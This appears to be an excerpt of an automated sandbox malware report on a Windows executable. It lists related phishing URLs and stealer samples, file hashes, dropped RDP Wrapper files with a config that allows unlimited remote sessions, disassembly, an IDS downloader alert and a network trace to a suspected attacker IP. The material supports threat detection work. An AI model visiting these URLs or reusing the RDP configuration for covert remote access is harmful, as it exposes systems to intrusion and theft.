                                                                                                            http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                            • 104.26.12.205
                                                                                                            https://trello.com/c/HA4sCE32Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.18.36.155
                                                                                                            https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.18.95.41
                                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                                            • 104.22.72.81
                                                                                                            http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            Message_2484922.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            http://arcor.cfd#warszawa@psgaz.plGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://terryatchison-my.sharepoint.com/:f:/g/personal/terry_terryatchison_com_au/ElPLLTBYg_xBi3psE6F6HW0BDiAPLHOUdwoTRpPTGgsocg?e=hlVHMOGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            AS-PUBMATICUSKpCJCaQswCshdLQFFKLtCbGdhL.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 185.64.191.210
                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • 8.46.123.33
                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • 8.46.123.33
                                                                                                            http://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                                                                                            • 185.64.191.210
                                                                                                            https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 185.64.191.210
                                                                                                            moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 198.47.127.20
                                                                                                            Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 185.64.191.210
                                                                                                            moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                            • 198.47.127.18
                                                                                                            https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 198.47.127.205
                                                                                                            https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=Get hashmaliciousUnknownBrowse
                                                                                                            • 185.64.191.210
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0epayload.cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            1 (2).cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            rbx-CO2.batGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            SC.cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 188.114.97.3
                                                                                                            QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                            • 188.114.97.3
                                                                                                            1.cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            2.cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.97.3
                                                                                                            download_2.exeGet hashmaliciousQuasarBrowse
                                                                                                            • 188.114.97.3
                                                                                                            PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 188.114.97.3
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Program Files\RDP Wrapper\rdpwrap.dllfile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):116736
                                                                                                                                Entropy (8bit):5.884975745255681
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                                                                                MD5:461ADE40B800AE80A40985594E1AC236
                                                                                                                                SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                                                                                SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                                                                                SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):443552
                                                                                                                                Entropy (8bit):5.4496544667416975
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                                                                                MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                                                                                SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                                                                                SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                                                                                SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                                                                                Malicious:false
                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                File Type:CSV text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1298
                                                                                                                                Entropy (8bit):5.345181606725495
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2c/sXE4qdKm:MxHKlYHKh3oPtHo6hAHKzeBHCHHA
                                                                                                                                MD5:B602069B69E310409FAD82BFC3CBB818
                                                                                                                                SHA1:ED23568805903474D8E77BCE3AD927E5065FFFCD
                                                                                                                                SHA-256:979D1AD6AF4CFA4BF6782D5F781BE35F0C7B9FF42B09EE9D3165A3E8F3B80E57
                                                                                                                                SHA-512:A5EFDA1DAA3616317054E5F692DF3A7ACA497DFA7BD3B42F056777F0CA3BAF422725C88C47FDC8718CA157CABB15BCCDC26EDAF8A31ECA491FC1C38A8342C43C
                                                                                                                                Malicious:true
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di
                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):1785344
                                                                                                                                Entropy (8bit):6.646511331349125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                                                                                                MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                                                SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                                                                                                SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                                                                                                SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................
                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):37376
                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7
                                                                                                                                Entropy (8bit):2.2359263506290326
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:t:t
                                                                                                                                MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                Malicious:false
                                                                                                                                Preview:Ok.....
                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):64
                                                                                                                                Entropy (8bit):3.6075632069840315
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:upLfVI2Y1AnVJulLn:up2GjqLn
                                                                                                                                MD5:A8A34531E35BAD9B34F0EF69126256B6
                                                                                                                                SHA1:53CBA26592FA0FC0E2B25DD7BEF57290DD78DB29
                                                                                                                                SHA-256:FF33C7BF3A831C13344F9CA4287B56723F3D9F80C7A7D91E0C3BD6B995FE92B5
                                                                                                                                SHA-512:6D3EEB22F88465C6249096EB2057E138B24680B1020CF83EF6576C3AF6D2021DD3564EFDDA1791CE149E9F6A7E753F46C6450ABF4E96192FA941E73589DC58C3
                                                                                                                                Malicious:false
                                                                                                                                Preview:....5.8.5.9.4.8.....\MAILSLOT\NET\GETDCA7599CB3.................
                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.971372283511289
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                File name:file.exe
                                                                                                                                File size:2'066'432 bytes
                                                                                                                                MD5:ea2954e7fc00520a5300e72edea11b0f
                                                                                                                                SHA1:cb9c5443999a5f62e83bb03756f8e1a8bcbefdb1
                                                                                                                                SHA256:ae939c4c31af5fc5e66e5f991239949a572f3af905118ae2f94fdf6dd080bc01
                                                                                                                                SHA512:a1b5085f270b46c7eac939c2b635d861513874aea797124410bdf8538a824fb5203532ed676b9cc2bc12868efb3d4e9509af2d2a3942608a9dcf997b435f408a
                                                                                                                                SSDEEP:24576:H4VJRQQ6MczUMPwjgagC2lsJCC3jDlE4j7xOi5WX0rB7uivDX/CYzQ84GpxkFScs:HMPDJ1jgxs5lPjtzWcB1PHytJuu
                                                                                                                                TLSH:84A5231CBAEC8833CFCC97F960854484CBF0AA51715BF3E37A595EF426863D2990126B
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z..........."...0..N...........~... ........@.. .......................`............`................................
                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                Entrypoint:0x5d7eb4
                                                                                                                                Entrypoint Section:.}wo
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0xEF5ACDDE [Tue Apr 2 01:46:06 2097 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [004E8000h]
                                                                                                                                jecxz 00007FAE88F626A0h
                                                                                                                                aaa
                                                                                                                                pop ebp
                                                                                                                                out 7Dh, al
                                                                                                                                fbstp [edi]
                                                                                                                                pop ebp
                                                                                                                                loop 00007FAE88F626E1h
                                                                                                                                loopne 00007FAE88F62734h
                                                                                                                                pop esi
                                                                                                                                aaa
                                                                                                                                pop ebp
                                                                                                                                loop 00007FAE88F6268Eh
                                                                                                                                jns 00007FAE88F62707h
                                                                                                                                aaa
                                                                                                                                pop ebp
                                                                                                                                loop 00007FAE88F626FBh
                                                                                                                                mov esi, 1EE15D37h
                                                                                                                                sar dword ptr [esi+43h], cl
                                                                                                                                mov esi, E35D370Ch
                                                                                                                                retf
                                                                                                                                aaa
                                                                                                                                pop ebp
                                                                                                                                out E0h, eax
                                                                                                                                dec eax
                                                                                                                                sbb al, 37h
                                                                                                                                pop ebp
                                                                                                                                out 53h, eax
                                                                                                                                or eax, B030977Eh
                                                                                                                                aaa
                                                                                                                                pop ebp
                                                                                                                                in al, 4Ch
                                                                                                                                mov dl, D6h
                                                                                                                                xchg eax, edi
                                                                                                                                imul byte ptr [edi+1Fh]
                                                                                                                                sar dword ptr [edx-621F228Eh], 09h
                                                                                                                                push esi
                                                                                                                                pop ds
                                                                                                                                clc
                                                                                                                                iretd
                                                                                                                                je 00007FAE88F626D0h
                                                                                                                                loopne 00007FAE88F62691h
                                                                                                                                int D6h
                                                                                                                                insd
                                                                                                                                lahf
                                                                                                                                add dl, byte ptr [esi]
                                                                                                                                inc ecx
                                                                                                                                test eax, F1ADAA43h
                                                                                                                                test eax, 8377A843h
                                                                                                                                test eax, ECEAAC43h
                                                                                                                                loope 00007FAE88F6272Ah
                                                                                                                                inc eax
                                                                                                                                out DDh, al
                                                                                                                                dec esp
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xea9c00x28.}wo
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e20000x4e4.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e40000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x1f38e00x38.}wo
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xe80000x8.T"G
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x1f39200x48.}wo
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000xe4dd40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .T"G0xe80000x80x200dda7831bdb73b0371267cffcdd7847cbFalse0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .}wo0xea0000x1f78640x1f7a0019ec5bd101f269e44f128e7de2d10f04unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x2e20000x4e40x60095f868ca41aa98ead06ef0ad0a8a96a7False0.3763020833333333data3.735811379124929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x2e40000xc0x200cf7d6fdbf4a3caa4bc349b896cbd4cc5False0.048828125data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_VERSION0x2e20900x254data0.45805369127516776
                                                                                                                                RT_MANIFEST0x2e22f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-10-03T15:07:46.813181+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713104.26.12.20580TCP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 3, 2024 15:07:02.014641047 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:02.019458055 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:02.019527912 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:02.046128035 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:02.050932884 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876499891 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876523972 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876535892 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876580000 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.876625061 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876637936 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876650095 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876662016 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876687050 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.876708984 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.876811028 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876871109 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.876878977 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.877089977 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.881541967 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.922142029 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.976586103 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.976613998 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.976624012 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.976677895 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.976689100 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.976721048 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.976785898 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.976988077 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977013111 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977022886 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977049112 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.977088928 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.977288008 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977299929 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977309942 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977370024 CEST4970480192.168.2.5147.45.44.104
                                                                                                                                Oct 3, 2024 15:07:05.977708101 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977719069 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977730036 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977745056 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977756023 CEST8049704147.45.44.104192.168.2.5
                                                                                                                                Oct 3, 2024 15:07:05.977756023 CEST4970480192.168.2.5147.45.44.104
